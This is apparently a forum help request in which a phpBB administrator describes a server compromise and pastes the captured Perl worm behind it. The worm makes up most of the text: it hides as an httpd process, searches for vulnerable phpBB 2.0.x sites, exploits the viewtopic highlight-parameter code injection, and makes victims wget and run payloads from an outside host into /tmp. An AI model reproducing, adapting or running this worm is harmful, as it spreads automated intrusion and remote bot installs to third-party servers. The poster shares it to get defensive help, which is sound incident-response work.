Dear All,
**** pls excuse me if this was NOT posted to a correct category ****
My phpBB (/var/www/html/phpBB2 running in FC3) wrongly allow 777 and attacked by this hacker
(ip=81.196.20.134)
the /tmp/.666 and /tmp/.lick are invoked continuously seems phpBB is run.
And result in substantial problem on the sh (defunct) (zombie) processes.
I want expert advice:
1) how it is invoked?
2) how to STOP ?
3) now I only deny from the ip for access /var/www/html using .htaccess.
Mathew
------------------- lick.txt -------------------------
#### Nu exista patch pentru prostia umana #####
########### Romania #########################
######
Crash@WhiteHat.Cc ######
use strict;
use IO::Socket;
use IO::Handle;
my $process = '/usr/sbin/httpd';
$0="$process"."\0"x16;;
my $pid=fork;
sub fetch();
sub remote($);
sub http_query($);
sub encode($);
sub fetch(){
my $rnd=(int(rand(9999)));
my $s= (int(rand(1000)));
if ($rnd>1000) { $s= (int(rand(100)))}
my @str=(
"%22phpBB+2.0.4+%C2%A9+2001%2C+2002+%22",
"%22phpBB+2.0.4+%C2%A9+2001%2C+2002+%22+topic+777",
"viewtopic.php%3Ft",
"%22View+next+topic%22",
"%22View+previous+topic%22",
"viewtopic.php+%22Log+in+to+check+your+private+messages%22",
"%22Powered+by+phpBB%22+v-i-e-w-t-o-p-i-c-.-p-h-p",
"%22P-o-w-e-r-e-d+b-y+p-h-p-B-B%22",
"viewtopic.php+%22by+phpBB+2001%22",
"viewtopic.php+%22by+phpBB+2000%22",
"viewtopic.php+%22by+phpBB+2002%22",
"viewtopic.php+by+phpBB+2003%22",
"viewtopic.php+%22by+phpBB+2004%22",
"%22ALEKS+HACKED+YOUR+SYSTEM%22",
"viewtopic.php+%22by+phpBB+2005%22",
"viewtopic.php+%22by+phpBB+2006%22",
"intitle%3A%22%3A%3A+View+topic%22",
"viewtopic.php+%22+phpBB+Group%22",
"%22topic.php%3Ft%3D%22",
"%22%3A%3A+View+topic%22",
);
my $query="search.msn.com/results.aspx?q=";
$query.=$str[(rand(scalar(@str)))].$rnd;
$query.="&first=$s";
my @lst=();
my $page = http_query($query);
while ($page =~ m/<a href=\"?http:\/\/([^>\"]+)\"?>/g){
if ($1 !~ m/msn|cache|hotmail/){
push (@lst,$1);
}
}
return (@lst);
}
sub http_query($){
my ($url) = @_;
my $host=$url;
my $query=$url;
my $page="";
$host =~ s/href=\"?http:\/\///;
$host =~ s/([-a-zA-Z0-9\.]+)\/.*/$1/;
$query =~s/$host//;
if ($query eq "") {$query="/";};
eval {
local $SIG{ALRM} = sub { die "1";};
alarm 10;
my $sock = IO::Socket::INET->new(PeerAddr=>"$host",PeerPort=>"80",Proto=>"tcp") or return;
print $sock "GET $query HTTP/1.0\nHost: $host\nAccept: */*\nUser-Agent: Mozilla/4.0\n\n ";
my @r = <$sock>;
$page="@r";
alarm 0;
close($sock);
};
return $page;
}
sub encode($) {
my $s = shift;
$s =~ s/(.)/"chr(".ord($1).")%252E"/seg;
$s =~ s/%252E$//;
return $s;
}
eval {fork and exit;};
my $iam=$ARGV[0];
my $oneday=time+3600;
my $page="";
my @urls;
my $url;
while(time<$oneday){
@urls=fetch();
foreach $url (@urls) {
if ($url !~ /viewtopic.php/) {next;}
$url =~ s/(.*\/viewtopic.php\?[t|p]=[0-9]+).*/$1/;
my $cmd=encode("perl -e \"print q(jSVowMsd)\"");
$url .="&highlight=%2527%252Esystem(".$cmd.")%252E%2527";
$page = http_query($url);
if ( $page =~ /jSVowMsd/ ){
$url =~ s/&highlight.*//;
my $upload=$url;
$upload =~ s/viewtopic.*//;
$cmd="wget
http://lakexxx.go.ro/xpl.txt -O /tmp/.lick;perl /tmp/.lick"; # set cmd
$cmd=encode("$cmd"); # set cmd
$url .="&highlight=%2527%252Esystem(".$cmd.")%252E%2527";
$page = http_query($url);
$cmd="wget
http://lakexxx.go.ro/bot.txt -O /tmp/.666;perl /tmp/.666;touch /tmp/.666";
$cmd=encode("$cmd"); # set cmd
$url =~ s/&highlight.*//;
$url .="&highlight=%2527%252Esystem(".$cmd.")%252E%2527";
$page = http_query($url);
}
}
}